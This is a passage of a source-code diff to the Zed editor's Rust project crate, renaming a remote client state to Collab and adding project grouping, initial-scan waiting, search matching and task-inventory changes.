client_subscriptions: Default::default(), _subscriptions: vec![cx.on_release(Self::release)], collab_client: client.clone(), - client_state: ProjectClientState::Remote { + client_state: ProjectClientState::Collab { sharing_has_stopped: false, capability: Capability::ReadWrite, remote_id, @@ -1933,7 +1949,7 @@ impl Project { ProjectClientState::Shared { .. } => { let _ = self.unshare_internal(cx); } - ProjectClientState::Remote { remote_id, .. } => { + ProjectClientState::Collab { remote_id, .. } => { let _ = self.collab_client.send(proto::LeaveProject { project_id: *remote_id, }); @@ -1942,6 +1958,11 @@ impl Project { } } + #[cfg(feature = "test-support")] + pub fn client_subscriptions(&self) -> &Vec { + &self.client_subscriptions + } + #[cfg(feature = "test-support")] pub async fn example( root_paths: impl IntoIterator, @@ -2073,6 +2094,12 @@ impl Project { self.worktree_store.clone() } + /// Returns a future that resolves when all visible worktrees have completed + /// their initial scan. + pub fn wait_for_initial_scan(&self, cx: &App) -> impl Future + use<> { + self.worktree_store.read(cx).wait_for_initial_scan() + } + #[inline] pub fn context_server_store(&self) -> Entity { self.context_server_store.clone() @@ -2154,7 +2181,7 @@ impl Project { match self.client_state { ProjectClientState::Local => None, ProjectClientState::Shared { remote_id, .. } - | ProjectClientState::Remote { remote_id, .. } => Some(remote_id), + | ProjectClientState::Collab { remote_id, .. } => Some(remote_id), } } @@ -2208,7 +2235,7 @@ impl Project { #[inline] pub fn replica_id(&self) -> ReplicaId { match self.client_state { - ProjectClientState::Remote { replica_id, .. } => replica_id, + ProjectClientState::Collab { replica_id, .. 
} => replica_id, _ => { if self.remote_client.is_some() { ReplicaId::REMOTE_SERVER @@ -2282,12 +2309,62 @@ impl Project { self.worktree_store.read(cx).visible_worktrees(cx) } + pub(crate) fn default_visible_worktree_paths( + worktree_store: &WorktreeStore, + cx: &App, + ) -> Vec { + worktree_store + .visible_worktrees(cx) + .sorted_by(|left, right| { + left.read(cx) + .is_single_file() + .cmp(&right.read(cx).is_single_file()) + }) + .filter_map(|worktree| { + let worktree = worktree.read(cx); + let path = worktree.abs_path(); + if worktree.is_single_file() { + Some(path.parent()?.to_path_buf()) + } else { + Some(path.to_path_buf()) + } + }) + .collect() + } + + pub fn default_path_list(&self, cx: &App) -> PathList { + let worktree_roots = + Self::default_visible_worktree_paths(&self.worktree_store.read(cx), cx); + + if worktree_roots.is_empty() { + PathList::new(&[paths::home_dir().as_path()]) + } else { + PathList::new(&worktree_roots) + } + } + #[inline] pub fn worktree_for_root_name(&self, root_name: &str, cx: &App) -> Option> { self.visible_worktrees(cx) .find(|tree| tree.read(cx).root_name() == root_name) } + pub fn project_group_key(&self, cx: &App) -> ProjectGroupKey { + let roots = self + .visible_worktrees(cx) + .map(|worktree| { + let snapshot = worktree.read(cx).snapshot(); + snapshot + .root_repo_common_dir() + .and_then(|dir| Some(dir.parent()?.to_path_buf())) + .unwrap_or(snapshot.abs_path().to_path_buf()) + }) + .collect::>(); + let host = self.remote_connection_options(cx); + let path_list = PathList::new(&roots); + ProjectGroupKey::new(host, path_list) + } + #[inline] pub fn worktree_root_names<'a>(&'a self, cx: &'a App) -> impl Iterator { self.visible_worktrees(cx) @@ -2722,7 +2799,7 @@ impl Project { } else { Capability::ReadOnly }; - if let ProjectClientState::Remote { capability, .. } = &mut self.client_state { + if let ProjectClientState::Collab { capability, .. 
} = &mut self.client_state { if *capability == new_capability { return; } @@ -2735,12 +2812,13 @@ impl Project { } fn disconnected_from_host_internal(&mut self, cx: &mut App) { - if let ProjectClientState::Remote { + if let ProjectClientState::Collab { sharing_has_stopped, .. } = &mut self.client_state { *sharing_has_stopped = true; + self.client_subscriptions.clear(); self.collaborators.clear(); self.worktree_store.update(cx, |store, cx| { store.disconnected_from_host(cx); @@ -2761,7 +2839,7 @@ impl Project { #[inline] pub fn is_disconnected(&self, cx: &App) -> bool { match &self.client_state { - ProjectClientState::Remote { + ProjectClientState::Collab { sharing_has_stopped, .. } => *sharing_has_stopped, @@ -2783,7 +2861,7 @@ impl Project { #[inline] pub fn capability(&self) -> Capability { match &self.client_state { - ProjectClientState::Remote { capability, .. } => *capability, + ProjectClientState::Collab { capability, .. } => *capability, ProjectClientState::Shared { .. } | ProjectClientState::Local => Capability::ReadWrite, } } @@ -2799,7 +2877,7 @@ impl Project { ProjectClientState::Local | ProjectClientState::Shared { .. } => { self.remote_client.is_none() } - ProjectClientState::Remote { .. } => false, + ProjectClientState::Collab { .. } => false, } } @@ -2810,7 +2888,7 @@ impl Project { ProjectClientState::Local | ProjectClientState::Shared { .. } => { self.remote_client.is_some() } - ProjectClientState::Remote { .. } => false, + ProjectClientState::Collab { .. } => false, } } @@ -2819,7 +2897,7 @@ impl Project { pub fn is_via_collab(&self) -> bool { match &self.client_state { ProjectClientState::Local | ProjectClientState::Shared { .. } => false, - ProjectClientState::Remote { .. } => true, + ProjectClientState::Collab { .. } => true, } } @@ -3630,11 +3708,11 @@ impl Project { event: &BufferEvent, cx: &mut Context, ) -> Option<()> { - if matches!(event, BufferEvent::Edited | BufferEvent::Reloaded) { + if matches!(event, BufferEvent::Edited { .. 
} | BufferEvent::Reloaded) { self.request_buffer_diff_recalculation(&buffer, cx); } - if matches!(event, BufferEvent::Edited) { + if matches!(event, BufferEvent::Edited { .. }) { cx.emit(Event::BufferEdited); } @@ -4492,7 +4570,7 @@ impl Project { match &self.client_state { ProjectClientState::Shared { .. } => true, ProjectClientState::Local => false, - ProjectClientState::Remote { .. } => true, + ProjectClientState::Collab { .. } => true, } } @@ -4685,6 +4763,19 @@ impl Project { }); } + pub fn remove_worktree_for_main_worktree_path( + &mut self, + path: impl AsRef, + cx: &mut Context, + ) { + let path = path.as_ref(); + self.worktree_store.update(cx, |worktree_store, cx| { + if let Some(worktree) = worktree_store.worktree_for_main_worktree_path(path, cx) { + worktree_store.remove_worktree(worktree.read(cx).id(), cx); + } + }); + } + fn add_worktree(&mut self, worktree: &Entity, cx: &mut Context) { self.worktree_store.update(cx, |worktree_store, cx| { worktree_store.add(worktree, cx); @@ -5493,25 +5584,51 @@ impl Project { let key = (worktree_id, path); log::debug!("handle_create_file_for_peer: looking up key={:?}", key); - let mut files = downloading_files.lock(); - log::trace!( - "handle_create_file_for_peer: current downloading_files keys: {:?}", - files.keys().collect::>() - ); + let empty_file_destination: Option = { + let mut files = downloading_files.lock(); + log::trace!( + "handle_create_file_for_peer: current downloading_files keys: {:?}", + files.keys().collect::>() + ); + + if let Some(file_entry) = files.get_mut(&key) { + file_entry.total_size = state.content_size; + file_entry.file_id = Some(state.id); + log::debug!( + "handle_create_file_for_peer: updated file entry: total_size={}, file_id={}", + state.content_size, + state.id + ); + } else { + log::warn!( + "handle_create_file_for_peer: key={:?} not found in downloading_files", + key + ); + } + + if state.content_size == 0 { + // No chunks will arrive for an empty file; write it now. 
+ files.remove(&key).map(|entry| entry.destination_path) + } else { + None + } + }; - if let Some(file_entry) = files.get_mut(&key) { - file_entry.total_size = state.content_size; - file_entry.file_id = Some(state.id); + if let Some(destination) = empty_file_destination { log::debug!( - "handle_create_file_for_peer: updated file entry: total_size={}, file_id={}", - state.content_size, - state.id - ); - } else { - log::warn!( - "handle_create_file_for_peer: key={:?} not found in downloading_files", - key + "handle_create_file_for_peer: writing empty file to {:?}", + destination ); + match smol::fs::write(&destination, &[] as &[u8]).await { + Ok(_) => log::info!( + "handle_create_file_for_peer: successfully wrote file to {:?}", + destination + ), + Err(e) => log::error!( + "handle_create_file_for_peer: failed to write empty file: {:?}", + e + ), + } } } else { log::warn!("handle_create_file_for_peer: State has no file field"); @@ -5591,7 +5708,7 @@ impl Project { fn synchronize_remote_buffers(&mut self, cx: &mut Context) -> Task> { let project_id = match self.client_state { - ProjectClientState::Remote { + ProjectClientState::Collab { sharing_has_stopped, remote_id, .. @@ -5930,6 +6047,49 @@ impl Project { } } +/// Identifies a project group by a set of paths the workspaces in this group +/// have. +/// +/// Paths are mapped to their main worktree path first so we can group +/// workspaces by main repos. +#[derive(PartialEq, Eq, Hash, Clone, Debug)] +pub struct ProjectGroupKey { + paths: PathList, + host: Option, +} + +impl ProjectGroupKey { + /// Creates a new `ProjectGroupKey` with the given path list. + /// + /// The path list should point to the git main worktree paths for a project. 
+ pub fn new(host: Option, paths: PathList) -> Self { + Self { paths, host } + } + + pub fn display_name(&self) -> SharedString { + let mut names = Vec::with_capacity(self.paths.paths().len()); + for abs_path in self.paths.paths() { + if let Some(name) = abs_path.file_name() { + names.push(name.to_string_lossy().to_string()); + } + } + if names.is_empty() { + // TODO: Can we do something better in this case? + "Empty Workspace".into() + } else { + names.join(", ").into() + } + } + + pub fn path_list(&self) -> &PathList { + &self.paths + } + + pub fn host(&self) -> Option { + self.host.clone() + } +} + pub struct PathMatchCandidateSet { pub snapshot: Snapshot, pub include_ignored: bool, diff --git a/crates/project/src/project_search.rs b/crates/project/src/project_search.rs index dff3312a3b34dc146153b60d1d5b034fbc720d65..921ad7e26a454d97719310069d81dd423e9208ca 100644 --- a/crates/project/src/project_search.rs +++ b/crates/project/src/project_search.rs @@ -164,6 +164,11 @@ impl Search { let buffer = handle.read(cx); if !buffers.is_searchable(&buffer.remote_id()) { continue; + } else if buffer + .file() + .is_some_and(|file| file.disk_state().is_deleted()) + { + continue; } else if let Some(entry_id) = buffer.entry_id(cx) { open_buffers.insert(entry_id); } else { @@ -586,6 +591,9 @@ impl Search { .filter(|buffer| { let b = buffer.read(cx); if let Some(file) = b.file() { + if file.disk_state().is_deleted() { + return false; + } if !search_query.match_path(file.path()) { return false; } diff --git a/crates/project/src/project_settings.rs b/crates/project/src/project_settings.rs index 75a3faf4f82d9e98e3c85a96222486cac217afd4..9258b16eef9f1c07cc44987f6608c2e0867c4154 100644 --- a/crates/project/src/project_settings.rs +++ b/crates/project/src/project_settings.rs @@ -1407,35 +1407,38 @@ impl SettingsObserver { let (mut user_tasks_file_rx, watcher_task) = watch_config_file(cx.background_executor(), fs, file_path.clone()); let user_tasks_content = 
cx.foreground_executor().block_on(user_tasks_file_rx.next()); - let weak_entry = cx.weak_entity(); cx.spawn(async move |settings_observer, cx| { let _watcher_task = watcher_task; let Ok(task_store) = settings_observer.read_with(cx, |settings_observer, _| { - settings_observer.task_store.clone() + settings_observer.task_store.downgrade() }) else { return; }; if let Some(user_tasks_content) = user_tasks_content { - task_store.update(cx, |task_store, cx| { - task_store - .update_user_tasks( - TaskSettingsLocation::Global(&file_path), - Some(&user_tasks_content), - cx, - ) - .log_err(); - }); + task_store + .update(cx, |task_store, cx| { + task_store + .update_user_tasks( + TaskSettingsLocation::Global(&file_path), + Some(&user_tasks_content), + cx, + ) + .log_err(); + }) + .ok(); } while let Some(user_tasks_content) = user_tasks_file_rx.next().await { - let result = task_store.update(cx, |task_store, cx| { + let Ok(result) = task_store.update(cx, |task_store, cx| { task_store.update_user_tasks( TaskSettingsLocation::Global(&file_path), Some(&user_tasks_content), cx, ) - }); + }) else { + continue; + }; - weak_entry + settings_observer .update(cx, |_, cx| match result { Ok(()) => cx.emit(SettingsObserverEvent::LocalTasksUpdated(Ok( file_path.clone() @@ -1459,35 +1462,38 @@ impl SettingsObserver { let (mut user_tasks_file_rx, watcher_task) = watch_config_file(cx.background_executor(), fs, file_path.clone()); let user_tasks_content = cx.foreground_executor().block_on(user_tasks_file_rx.next()); - let weak_entry = cx.weak_entity(); cx.spawn(async move |settings_observer, cx| { let _watcher_task = watcher_task; let Ok(task_store) = settings_observer.read_with(cx, |settings_observer, _| { - settings_observer.task_store.clone() + settings_observer.task_store.downgrade() }) else { return; }; if let Some(user_tasks_content) = user_tasks_content { - task_store.update(cx, |task_store, cx| { - task_store - .update_user_debug_scenarios( - TaskSettingsLocation::Global(&file_path), 
- Some(&user_tasks_content), - cx, - ) - .log_err(); - }); + task_store + .update(cx, |task_store, cx| { + task_store + .update_user_debug_scenarios( + TaskSettingsLocation::Global(&file_path), + Some(&user_tasks_content), + cx, + ) + .log_err(); + }) + .ok(); } while let Some(user_tasks_content) = user_tasks_file_rx.next().await { - let result = task_store.update(cx, |task_store, cx| { + let Ok(result) = task_store.update(cx, |task_store, cx| { task_store.update_user_debug_scenarios( TaskSettingsLocation::Global(&file_path), Some(&user_tasks_content), cx, ) - }); + }) else { + continue; + }; - weak_entry + settings_observer .update(cx, |_, cx| match result { Ok(()) => cx.emit(SettingsObserverEvent::LocalDebugScenariosUpdated(Ok( file_path.clone(), diff --git a/crates/project/src/search.rs b/crates/project/src/search.rs index 3a554eb3da1557849e18846b09a7787ab939f46d..cd4702d04863c2fc3026700b2d6653e1db24dbff 100644 --- a/crates/project/src/search.rs +++ b/crates/project/src/search.rs @@ -620,4 +620,56 @@ impl SearchQuery { Self::Text { .. } => None, } } + + pub fn search_str(&self, text: &str) -> Vec> { + if self.as_str().is_empty() { + return Vec::new(); + } + + let is_word_char = |c: char| c.is_alphanumeric() || c == '_'; + + let mut matches = Vec::new(); + match self { + Self::Text { + search, whole_word, .. + } => { + for mat in search.find_iter(text.as_bytes()) { + if *whole_word { + let prev_char = text[..mat.start()].chars().last(); + let next_char = text[mat.end()..].chars().next(); + if prev_char.is_some_and(&is_word_char) + || next_char.is_some_and(&is_word_char) + { + continue; + } + } + matches.push(mat.start()..mat.end()); + } + } + Self::Regex { + regex, + multiline, + one_match_per_line, + .. 
+ } => { + if *multiline { + for mat in regex.find_iter(text).flatten() { + matches.push(mat.start()..mat.end()); + } + } else { + let mut line_offset = 0; + for line in text.split('\n') { + for mat in regex.find_iter(line).flatten() { + matches.push((line_offset + mat.start())..(line_offset + mat.end())); + if *one_match_per_line { + break; + } + } + line_offset += line.len() + 1; + } + } + } + } + matches + } } diff --git a/crates/project/src/search_history.rs b/crates/project/src/search_history.rs index de3548e4d2670675d441a7bf40e595158e7d34a3..a3b0c0a1bc89ca0fe1f770c6d08b21d740943470 100644 --- a/crates/project/src/search_history.rs +++ b/crates/project/src/search_history.rs @@ -19,12 +19,19 @@ pub enum QueryInsertionBehavior { #[derive(Default, Debug, Clone, PartialEq, Eq, Hash)] pub struct SearchHistoryCursor { selection: Option, + draft: Option, } impl SearchHistoryCursor { - /// Resets the selection to `None`. + /// Resets the selection to `None` and clears the draft. pub fn reset(&mut self) { self.selection = None; + self.draft = None; + } + + /// Takes the stored draft query, if any. + pub fn take_draft(&mut self) -> Option { + self.draft.take() } } @@ -45,6 +52,8 @@ impl SearchHistory { } pub fn add(&mut self, cursor: &mut SearchHistoryCursor, search_string: String) { + cursor.draft = None; + if self.insertion_behavior == QueryInsertionBehavior::ReplacePreviousIfContains && let Some(previously_searched) = self.history.back_mut() && search_string.contains(previously_searched.as_str()) @@ -81,7 +90,23 @@ impl SearchHistory { /// Get the previous history entry using the given `SearchHistoryCursor`. /// Uses the last element in the history when there is no cursor. - pub fn previous(&mut self, cursor: &mut SearchHistoryCursor) -> Option<&str> { + /// + /// `current_query` is the current text in the search editor. 
If it differs + /// from the history entry at the cursor position (or if the cursor has no + /// selection), it is saved as a draft so it can be restored later. + pub fn previous( + &mut self, + cursor: &mut SearchHistoryCursor, + current_query: &str, + ) -> Option<&str> { + let matches_history = cursor + .selection + .and_then(|i| self.history.get(i)) + .is_some_and(|entry| entry == current_query); + if !matches_history { + cursor.draft = Some(current_query.to_string()); + } + let prev_index = match cursor.selection { Some(index) => index.checked_sub(1)?, None => self.history.len().checked_sub(1)?, diff --git a/crates/project/src/task_inventory.rs b/crates/project/src/task_inventory.rs index 205232b523cf3773d895368ba0b1b7d2d32a7afe..663380181015d52c9a91f1a23c7bd0d48d8ac57d 100644 --- a/crates/project/src/task_inventory.rs +++ b/crates/project/src/task_inventory.rs @@ -15,20 +15,20 @@ use gpui::{App, AppContext as _, Context, Entity, SharedString, Task, WeakEntity use itertools::Itertools; use language::{ Buffer, ContextLocation, ContextProvider, File, Language, LanguageToolchainStore, Location, - language_settings::language_settings, + language_settings::LanguageSettings, }; use lsp::{LanguageServerId, LanguageServerName}; use paths::{debug_task_file_name, task_file_name}; use settings::{InvalidSettingsError, parse_json_with_comments}; use task::{ - DebugScenario, ResolvedTask, SharedTaskContext, TaskContext, TaskId, TaskTemplate, + DebugScenario, ResolvedTask, SharedTaskContext, TaskContext, TaskHook, TaskId, TaskTemplate, TaskTemplates, TaskVariables, VariableName, }; use text::{BufferId, Point, ToPoint}; use util::{NumericPrefixWithSuffix, ResultExt as _, post_inc, rel_path::RelPath}; use worktree::WorktreeId; -use crate::{task_store::TaskSettingsLocation, worktree_store::WorktreeStore}; +use crate::{git_store::GitStore, task_store::TaskSettingsLocation, worktree_store::WorktreeStore}; #[derive(Clone, Debug, Default)] pub struct DebugScenarioContext { @@ -84,10 
+84,20 @@ impl InventoryFor { &self, worktree: WorktreeId, ) -> impl '_ + Iterator { - self.worktree - .get(&worktree) + let worktree_dirs = self.worktree.get(&worktree); + let has_zed_dir = worktree_dirs + .map(|dirs| { + dirs.keys() + .any(|dir| dir.file_name().is_some_and(|name| name == ".zed")) + }) + .unwrap_or(false); + + worktree_dirs .into_iter() .flatten() + .filter(move |(directory, _)| { + !(has_zed_dir && directory.file_name().is_some_and(|name| name == ".vscode")) + }) .flat_map(|(directory, templates)| { templates.iter().map(move |template| (directory, template)) }) @@ -302,17 +312,15 @@ impl Inventory { let last_scheduled_scenarios = self.last_scheduled_scenarios.iter().cloned().collect(); let adapter = task_contexts.location().and_then(|location| { - let (file, language) = { - let buffer = location.buffer.read(cx); - (buffer.file(), buffer.language()) - }; - let language_name = language.as_ref().map(|l| l.name()); - let adapter = language_settings(language_name, file, cx) + let buffer = location.buffer.read(cx); + let adapter = LanguageSettings::for_buffer(&buffer, cx) .debuggers .first() .map(SharedString::from) .or_else(|| { - language.and_then(|l| l.config().debuggers.first().map(SharedString::from)) + buffer + .language() + .and_then(|l| l.config().debuggers.first().map(SharedString::from)) }); adapter.map(|adapter| (adapter, DapRegistry::global(cx).locators())) }); @@ -350,19 +358,18 @@ impl Inventory { label: &str, cx: &App, ) -> Task> { - let (buffer_worktree_id, file, language) = buffer + let (buffer_worktree_id, language) = buffer + .as_ref() .map(|buffer| { let buffer = buffer.read(cx); - let file = buffer.file().cloned(); ( - file.as_ref().map(|file| file.worktree_id(cx)), - file, + buffer.file().as_ref().map(|file| file.worktree_id(cx)), buffer.language().cloned(), ) }) - .unwrap_or((None, None, None)); + .unwrap_or((None, None)); - let tasks = self.list_tasks(file, language, worktree_id.or(buffer_worktree_id), cx); + let tasks = 
self.list_tasks(buffer, language, worktree_id.or(buffer_worktree_id), cx); let label = label.to_owned(); cx.background_spawn(async move { tasks @@ -378,7 +385,7 @@ impl Inventory { /// and global tasks last. No specific order inside source kinds groups. pub fn list_tasks( &self, - file: Option>, + buffer: Option>, language: Option>, worktree: Option, cx: &App, @@ -394,14 +401,18 @@ impl Inventory { }); let language_tasks = language .filter(|language| { - language_settings(Some(language.name()), file.as_ref(), cx) - .tasks - .enabled + LanguageSettings::resolve( + buffer.as_ref().map(|b| b.read(cx)), + Some(&language.name()), + cx, + ) + .tasks + .enabled }) .and_then(|language| { language .context_provider() - .map(|provider| provider.associated_tasks(file, cx)) + .map(|provider| provider.associated_tasks(buffer, cx)) }); cx.background_spawn(async move { if let Some(t) = language_tasks { @@ -435,7 +446,18 @@ impl Inventory { let task_source_kind = language.as_ref().map(|language| TaskSourceKind::Language { name: language.name().into(), }); - let file = location.and_then(|location| location.buffer.read(cx).file().cloned()); + let buffer = location.map(|location| location.buffer.clone()); + + let worktrees_with_zed_tasks: HashSet = self + .templates_from_settings + .worktree + .iter() + .filter(|(_, dirs)| { + dirs.keys() + .any(|dir| dir.file_name().is_some_and(|name| name == ".zed")) + }) + .map(|(id, _)| *id) + .collect(); let mut task_labels_to_ids = HashMap::>::default(); let mut lru_score = 0_u32; @@ -446,6 +468,14 @@ impl Inventory { .filter(|(task_kind, _)| { if matches!(task_kind, TaskSourceKind::Language { .. }) { Some(task_kind) == task_source_kind.as_ref() + } else if let TaskSourceKind::Worktree { + id, + directory_in_worktree: dir, + .. 
+ } = task_kind + { + !(worktrees_with_zed_tasks.contains(id) + && dir.file_name().is_some_and(|name| name == ".vscode")) } else { true } @@ -478,14 +508,18 @@ impl Inventory { let global_tasks = self.global_templates_from_settings().collect::>(); let associated_tasks = language .filter(|language| { - language_settings(Some(language.name()), file.as_ref(), cx) - .tasks - .enabled + LanguageSettings::resolve( + buffer.as_ref().map(|b| b.read(cx)), + Some(&language.name()), + cx, + ) + .tasks + .enabled }) .and_then(|language| { language .context_provider() - .map(|provider| provider.associated_tasks(file, cx)) + .map(|provider| provider.associated_tasks(buffer, cx)) }); let worktree_tasks = worktree .into_iter() @@ -610,6 +644,19 @@ impl Inventory { self.last_scheduled_tasks.retain(|(_, task)| &task.id != id); } + /// Returns all task templates (worktree and global) that have at least one + /// hook in the provided set. + pub fn templates_with_hooks( + &self, + hooks: &HashSet, + worktree: WorktreeId, + ) -> Vec<(TaskSourceKind, TaskTemplate)> { + self.worktree_templates_from_settings(worktree) + .chain(self.global_templates_from_settings()) + .filter(|(_, template)| !template.hooks.is_disjoint(hooks)) + .collect() + } + fn global_templates_from_settings( &self, ) -> impl '_ + Iterator { @@ -884,11 +931,15 @@ fn task_variables_preference(task: &ResolvedTask) -> Reverse { /// Applied as a base for every custom [`ContextProvider`] unless explicitly oped out. 
pub struct BasicContextProvider { worktree_store: Entity, + git_store: Entity, } impl BasicContextProvider { - pub fn new(worktree_store: Entity) -> Self { - Self { worktree_store } + pub fn new(worktree_store: Entity, git_store: Entity) -> Self { + Self { + worktree_store, + git_store, + } } } @@ -968,6 +1019,19 @@ impl ContextProvider for BasicContextProvider { } } + if let Some(worktree_id) = location.buffer.read(cx).file().map(|f| f.worktree_id(cx)) { + if let Some(path) = self + .git_store + .read(cx) + .original_repo_path_for_worktree(worktree_id, cx) + { + task_variables.insert( + VariableName::MainGitWorktree, + path.to_string_lossy().into_owned(), + ); + } + } + if let Some(current_file) = current_file { let path = current_file.abs_path(cx); if let Some(filename) = path.file_name().and_then(|f| f.to_str()) { @@ -985,6 +1049,10 @@ impl ContextProvider for BasicContextProvider { task_variables.insert(VariableName::File, path.to_string_lossy().into_owned()); } + if let Some(language) = buffer.language() { + task_variables.insert(VariableName::Language, language.name().to_string()); + } + Task::ready(Ok(task_variables)) } } @@ -1003,7 +1071,7 @@ impl ContextProviderWithTasks { } impl ContextProvider for ContextProviderWithTasks { - fn associated_tasks(&self, _: Option>, _: &App) -> Task> { + fn associated_tasks(&self, _: Option>, _: &App) -> Task> { Task::ready(Some(self.templates.clone())) } } diff --git a/crates/project/src/task_store.rs b/crates/project/src/task_store.rs index 7aec460aeb9917eb9c1c58668ece4a10033a7ac9..5b91a3a8901d63e7311fb7ec81a69767b68e02d4 100644 --- a/crates/project/src/task_store.rs +++ b/crates/project/src/task_store.rs @@ -19,7 +19,7 @@ use util::ResultExt; use crate::{ BasicContextProvider, Inventory, ProjectEnvironment, buffer_store::BufferStore, - worktree_store::WorktreeStore, + git_store::GitStore, worktree_store::WorktreeStore, }; // platform-dependent warning @@ -33,6 +33,7 @@ pub struct StoreState { task_inventory: Entity, 
buffer_store: WeakEntity, worktree_store: Entity, + git_store: Entity, toolchain_store: Arc, } @@ -163,6 +164,7 @@ impl TaskStore { worktree_store: Entity, toolchain_store: Arc, environment: Entity, + git_store: Entity, cx: &mut Context, ) -> Self { Self::Functional(StoreState { @@ -172,6 +174,7 @@ impl TaskStore { }, task_inventory: Inventory::new(cx), buffer_store, + git_store, toolchain_store, worktree_store, }) @@ -183,6 +186,7 @@ impl TaskStore { toolchain_store: Arc, upstream_client: AnyProtoClient, project_id: u64, + git_store: Entity, cx: &mut Context, ) -> Self { Self::Functional(StoreState { @@ -192,6 +196,7 @@ impl TaskStore { }, task_inventory: Inventory::new(cx), buffer_store, + git_store, toolchain_store, worktree_store, }) @@ -207,6 +212,7 @@ impl TaskStore { TaskStore::Functional(state) => match &state.mode { StoreMode::Local { environment, .. } => local_task_context_for_location( state.worktree_store.clone(), + state.git_store.clone(), state.toolchain_store.clone(), environment.clone(), captured_variables, @@ -220,6 +226,7 @@ impl TaskStore { *project_id, upstream_client.clone(), state.worktree_store.clone(), + state.git_store.clone(), captured_variables, location, state.toolchain_store.clone(), @@ -302,6 +309,7 @@ impl TaskStore { fn local_task_context_for_location( worktree_store: Entity, + git_store: Entity, toolchain_store: Arc, environment: Entity, captured_variables: TaskVariables, @@ -329,7 +337,7 @@ fn local_task_context_for_location( worktree_store.clone(), location, project_env.clone(), - BasicContextProvider::new(worktree_store), + BasicContextProvider::new(worktree_store, git_store), toolchain_store, cx, ) @@ -351,6 +359,7 @@ fn remote_task_context_for_location( project_id: u64, upstream_client: AnyProtoClient, worktree_store: Entity, + git_store: Entity, captured_variables: TaskVariables, location: Location, toolchain_store: Arc, @@ -362,7 +371,7 @@ fn remote_task_context_for_location( .update(|cx| { let worktree_root = 
worktree_root(&worktree_store, &location, cx); - BasicContextProvider::new(worktree_store).build_context( + BasicContextProvider::new(worktree_store, git_store).build_context( &TaskVariables::default(), ContextLocation { fs: None, diff --git a/crates/project/src/toolchain_store.rs b/crates/project/src/toolchain_store.rs index 0820e4506e5c6b8d51c2732c64afcb21566350dd..c72b99c6a11271870ab8d4b4b73a7c8eb5e095ba 100644 --- a/crates/project/src/toolchain_store.rs +++ b/crates/project/src/toolchain_store.rs @@ -4,7 +4,7 @@ use anyhow::{Context as _, Result, bail}; use async_trait::async_trait; use collections::{BTreeMap, IndexSet}; -use fs::Fs; + use gpui::{ App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, WeakEntity, }; @@ -62,7 +62,6 @@ impl ToolchainStore { worktree_store: Entity, project_environment: Entity, manifest_tree: Entity, - fs: Arc, cx: &mut Context, ) -> Self { let entity = cx.new(|_| LocalToolchainStore { @@ -71,7 +70,6 @@ impl ToolchainStore { project_environment, active_toolchains: Default::default(), manifest_tree, - fs, }); let _sub = cx.subscribe(&entity, |_, _, e: &ToolchainStoreEvent, cx| { cx.emit(e.clone()) @@ -418,7 +416,6 @@ pub struct LocalToolchainStore { project_environment: Entity, active_toolchains: BTreeMap<(WorktreeId, LanguageName), BTreeMap, Toolchain>>, manifest_tree: Entity, - fs: Arc, } #[async_trait(?Send)] @@ -507,7 +504,6 @@ impl LocalToolchainStore { let registry = self.languages.clone(); let manifest_tree = self.manifest_tree.downgrade(); - let fs = self.fs.clone(); let environment = self.project_environment.clone(); cx.spawn(async move |this, cx| { @@ -554,12 +550,7 @@ impl LocalToolchainStore { cx.background_spawn(async move { Some(( toolchains - .list( - worktree_root, - relative_path.path.clone(), - project_env, - fs.as_ref(), - ) + .list(worktree_root, relative_path.path.clone(), project_env) .await, relative_path.path, )) @@ -593,7 +584,6 @@ impl LocalToolchainStore { ) -> Task> { let 
registry = self.languages.clone(); let environment = self.project_environment.clone(); - let fs = self.fs.clone(); cx.spawn(async move |_, cx| { let language = cx .background_spawn(registry.language_for_name(&language_name.0)) @@ -612,12 +602,8 @@ impl LocalToolchainStore { ) }) .await; - cx.background_spawn(async move { - toolchain_lister - .resolve(path, project_env, fs.as_ref()) - .await - }) - .await + cx.background_spawn(async move { toolchain_lister.resolve(path, project_env).await }) + .await }) } } diff --git a/crates/project/src/worktree_store.rs b/crates/project/src/worktree_store.rs index 31a6cc041eda875f3c7ee5b33b77519d7ee2b142..7ca721ddb50c3f216ed630665e547b60ce4d52bf 100644 --- a/crates/project/src/worktree_store.rs +++ b/crates/project/src/worktree_store.rs @@ -1,4 +1,5 @@ use std::{ + future::Future, path::{Path, PathBuf}, sync::{ Arc, @@ -15,6 +16,7 @@ use gpui::{ WeakEntity, }; use itertools::Either; +use postage::{prelude::Stream as _, watch}; use rpc::{ AnyProtoClient, ErrorExt, TypedEnvelope, proto::{self, REMOTE_SERVER_PROJECT_ID}, @@ -75,6 +77,7 @@ pub struct WorktreeStore { #[allow(clippy::type_complexity)] loading_worktrees: HashMap, Shared, Arc>>>>, + initial_scan_complete: (watch::Sender, watch::Receiver), state: WorktreeStoreState, } @@ -119,6 +122,7 @@ impl WorktreeStore { worktrees_reordered: false, scanning_enabled: true, retain_worktrees, + initial_scan_complete: watch::channel_with(true), state: WorktreeStoreState::Local { fs }, } } @@ -139,6 +143,7 @@ impl WorktreeStore { worktrees_reordered: false, scanning_enabled: true, retain_worktrees, + initial_scan_complete: watch::channel_with(true), state: WorktreeStoreState::Remote { upstream_client, upstream_project_id, @@ -174,6 +179,57 @@ impl WorktreeStore { pub fn disable_scanner(&mut self) { self.scanning_enabled = false; + *self.initial_scan_complete.0.borrow_mut() = true; + } + + /// Returns a future that resolves when all visible worktrees have completed + /// their initial scan 
(entries populated, git repos detected). + pub fn wait_for_initial_scan(&self) -> impl Future + use<> { + let mut rx = self.initial_scan_complete.1.clone(); + async move { + let mut done = *rx.borrow(); + while !done { + if let Some(value) = rx.recv().await { + done = value; + } else { + break; + } + } + } + } + + /// Returns whether all visible worktrees have completed their initial scan. + pub fn initial_scan_completed(&self) -> bool { + *self.initial_scan_complete.1.borrow() + } + + /// Checks whether all visible worktrees have completed their initial scan + /// and no worktree creations are pending, and updates the watch channel accordingly. + fn update_initial_scan_state(&mut self, cx: &App) { + let complete = self.loading_worktrees.is_empty() + && self + .visible_worktrees(cx) + .all(|wt| wt.read(cx).completed_scan_id() >= 1); + *self.initial_scan_complete.0.borrow_mut() = complete; + } + + /// Spawns a detached task that waits for a worktree's initial scan to complete, + /// then rechecks and updates the aggregate initial scan state. 
